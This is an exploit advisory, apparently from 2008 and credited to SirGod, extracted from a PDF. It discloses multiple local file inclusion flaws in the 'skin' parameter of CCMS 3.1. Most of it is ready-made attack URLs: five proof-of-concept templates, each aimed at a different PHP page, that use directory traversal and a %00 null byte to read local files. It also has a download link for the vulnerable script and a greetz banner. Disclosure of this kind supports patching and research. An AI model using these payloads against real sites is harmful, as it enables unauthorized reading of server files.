CCMS 3.1 skin Multiple Local File Inclusion Vulnerabilities.pdf

1 ############################################################################################ 2 [+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities 3 [+] Discovered By SirGod 4 [+] wWw.MorTal−TeaM.OrG 5 [+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke 6 ############################################################################################ 7 8 [+] Download Script : 9 10 http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar 11 12 [+] Local File Inclusion 13 14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 15 16 PoC 1 : 17 18 http://[target]/[path]/index.php?skin=[Local File]%00 19 20 Example 1 : 21 22 http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00 23 24 25 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 26 27 PoC 2 : 28 29 http://[target]/[path]/forums.php?skin=[Local File]%00 30 31 Example 2 : 32 33 http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00 34 35 36 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 37 38 PoC 3 : 39 40 http://[target]/[path]/admin.php?skin=[Local File]%00 41 42 Example 3 : 43 44 http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00 45 46 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 47 48 PoC 4 : 49 50 http://[target]/[path]/header.php?skin=[Local File]%00 51 52 Example 4 : Page 1/2 CCMS 3.1 skin Multiple Local File Inclusion Vulnerabilities SirGod 10/03/2008 53 54 http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00 55 56 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 57 58 PoC 5 : 59 60 http://[target]/[path]/pages/story.php?skin=[Local File]%00 61 62 Example 5 : 63 64 http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00 6